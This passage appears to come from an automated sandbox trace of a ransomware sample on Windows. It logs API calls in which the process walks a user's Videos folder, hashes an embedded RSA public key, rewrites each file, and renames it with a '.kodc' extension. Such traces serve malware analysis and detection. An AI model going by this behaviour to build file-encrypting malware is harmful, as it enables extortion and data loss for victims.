hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b90 | out: hHeap=0x630000) returned 1 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ba8 | out: hHeap=0x630000) returned 1 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ba8 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7b90 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ba8 | out: hHeap=0x630000) returned 1 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b90 | out: hHeap=0x630000) returned 1 [0100.071] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.072] GetCurrentThreadId () returned 0x42c [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba64b8 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.072] GetCurrentThreadId () returned 0x42c [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.072] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b90 [0100.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ba8 [0100.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b78 [0100.074] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.074] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x99da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.074] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.075] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.075] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.075] CloseHandle (hObject=0x5cc) returned 1 [0100.079] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FSlps3zeN2JQFky.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fslps3zen2jqfky.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FSlps3zeN2JQFky.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fslps3zen2jqfky.mp4.kodc")) returned 1 [0100.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.080] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.081] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3989090, ftCreationTime.dwHighDateTime=0x1d5bc5b, ftLastAccessTime.dwLowDateTime=0x2e8cd640, ftLastAccessTime.dwHighDateTime=0x1d5c0f5, ftLastWriteTime.dwLowDateTime=0x2e8cd640, ftLastWriteTime.dwHighDateTime=0x1d5c0f5, nFileSizeHigh=0x0, nFileSizeLow=0x9e1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FV7B4Ysx7Ewbiz.mkv", cAlternateFileName="FV7B4Y~1.MKV")) returned 1 [0100.081] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FV7B4Ysx7Ewbiz.mkv") returned=".mkv" [0100.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FV7B4Ysx7Ewbiz.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fv7b4ysx7ewbiz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.081] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=40479) returned 1 [0100.081] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.086] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9df9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.086] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.087] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.088] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x9e1f, lpOverlapped=0x0) returned 1 [0100.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.088] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.089] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.089] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.089] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.089] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.089] GetLastError () returned 0x0 [0100.089] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.090] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.090] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.090] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.090] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.090] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9e20) returned 0x9ba6d90 [0100.090] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c2f8 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b60 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c340 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b78 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ba8 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bc0 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.091] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ba8 | out: hHeap=0x630000) returned 1 [0100.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bc0 | out: hHeap=0x630000) returned 1 [0100.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7bc0 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ba8 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bc0 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ba8 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.093] GetCurrentThreadId () returned 0x42c [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6548 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.093] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.093] GetCurrentThreadId () returned 0x42c [0100.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ba8 [0100.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bc0 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b90 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 